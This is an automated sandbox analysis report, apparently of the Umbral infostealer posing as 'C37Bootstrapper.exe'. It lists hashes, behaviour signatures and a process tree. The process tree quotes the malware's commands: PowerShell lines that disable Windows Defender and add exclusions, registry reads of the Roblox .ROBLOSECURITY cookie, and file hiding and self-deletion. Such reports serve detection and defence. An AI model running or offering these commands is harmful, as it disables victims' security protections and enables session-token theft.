Analysis

  • max time kernel
    456s
  • max time network
    1176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-06-2024 16:14

General

  • Target

    C37boot/C37Bootstrapper.exe

  • Size

    405KB

  • MD5

    c8294556e29920bfcc619529da141096

  • SHA1

    7dad1b482c1d3baeade911400027e615e2ea52ff

  • SHA256

    26deb9a0264cccfdef387610235e9e9032144c8e73561c3d0007c248a6c84dc3

  • SHA512

    1ac29a6ecdf761d85d3b1b64910f7edd865238d1d6b159532efb8260fa9af35c7db06892359ba9efe7bd571ec2bd259a0621721666fd5b085e92f68848f63af6

  • SSDEEP

    6144:nloZM+rIkd8g+EtXHkv/iD4w85EFzQEb3CzFQMpFlb8e1mBiEqkRH:loZtL+EP8w85EFzQEb3CzFQMpfvEJ

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\C37boot\C37Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\C37boot\C37Bootstrapper.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3696
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\C37boot\C37Bootstrapper.exe"
      2⤵
      • Views/modifies file attributes
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\C37boot\C37Bootstrapper.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4352
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2192
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4268
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1068
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:4048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3416
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2632
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\C37boot\C37Bootstrapper.exe" && pause
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3516
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • Runs ping.exe
            PID:2024

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        a43e653ffb5ab07940f4bdd9cc8fade4

        SHA1

        af43d04e3427f111b22dc891c5c7ee8a10ac4123

        SHA256

        c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

        SHA512

        62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        e017179ec69926b671b38e74dc57c815

        SHA1

        133a0d59b796baaa15dd0df7a17565458ff159ee

        SHA256

        53f5a2a4fa0f6f0acfaaa4ec479d7efd0625014ffc8660fe642c2a4f822188ee

        SHA512

        ac305c8798b7fe36c9433f8941308cc017b1a565b04beebbf7925716a1a1dfe1d3854ea4a97891dc31da4fdf5c013dddf67eb587ed588931b2ff44bb1969709b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        0b8cb2e6dd5794b6a56a4bdbbd430fd7

        SHA1

        2b08e348c3489c6a35761af073018e3784c12074

        SHA256

        bcce0d44e33747e4c39df9afbd0a4e98a47ded0188375e4dfdd94cafbb366e1f

        SHA512

        15ce3b588aa80899f69b0313c7e188d886bddbd09783ca732ac33f9ae8e4e017a72b6f98919f581383a4582732575e5faedb0dea87e01cf2b657424945fdf4d2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        276798eeb29a49dc6e199768bc9c2e71

        SHA1

        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

        SHA256

        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

        SHA512

        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e3162109ea3d725ddc747eaa0ef699cb

        SHA1

        d9ba745670bb86fd131e30f221080821b637093d

        SHA256

        7171ee5d24fc23e988883b912d3dac7b79e7b9fa68005d18c4bf39c4af67a592

        SHA512

        968cb5b347c8680738088a4e66a3b9a16d27bfe400866e7905fd00176ed21d7c7dcb0131d209869753a401eaa6c5d9eebea4c1ba9575172b67d446872c063e7d

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0punexqn.j5a.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1660-71-0x00000155A7880000-0x00000155A788A000-memory.dmp

        Filesize

        40KB

      • memory/1660-35-0x000001558EFF0000-0x000001558F00E000-memory.dmp

        Filesize

        120KB

      • memory/1660-90-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

        Filesize

        10.8MB

      • memory/1660-72-0x00000155A78C0000-0x00000155A78D2000-memory.dmp

        Filesize

        72KB

      • memory/1660-2-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

        Filesize

        10.8MB

      • memory/1660-33-0x00000155A79F0000-0x00000155A7A66000-memory.dmp

        Filesize

        472KB

      • memory/1660-34-0x00000155A7830000-0x00000155A7880000-memory.dmp

        Filesize

        320KB

      • memory/1660-0-0x000001558D210000-0x000001558D27C000-memory.dmp

        Filesize

        432KB

      • memory/1660-1-0x00007FFC70883000-0x00007FFC70885000-memory.dmp

        Filesize

        8KB

      • memory/4856-15-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

        Filesize

        10.8MB

      • memory/4856-9-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

        Filesize

        10.8MB

      • memory/4856-14-0x000002A7BBD80000-0x000002A7BBDA2000-memory.dmp

        Filesize

        136KB

      • memory/4856-13-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

        Filesize

        10.8MB

      • memory/4856-18-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

        Filesize

        10.8MB